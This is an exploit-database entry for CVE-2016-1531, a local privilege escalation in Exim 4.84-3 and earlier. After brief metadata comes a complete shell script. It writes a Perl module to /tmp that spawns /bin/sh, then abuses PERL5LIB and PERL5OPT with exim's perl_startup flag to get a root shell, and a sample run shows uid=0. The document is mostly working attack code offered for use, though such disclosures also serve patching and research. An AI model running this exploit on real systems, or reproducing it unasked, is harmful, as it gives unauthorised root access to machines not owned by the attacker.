Exim 4.84-3 - Local Privilege Escalation

Author: Hacker Fantastic
type: local
platform: linux
port: 
date_added: 2016-03-09 
date_updated: 2016-10-10 
verified: 1 
codes: CVE-2016-1531 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comexim4_4.84.orig.tar.bz2

#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps.
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
#
# -- Hacker Fantastic
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps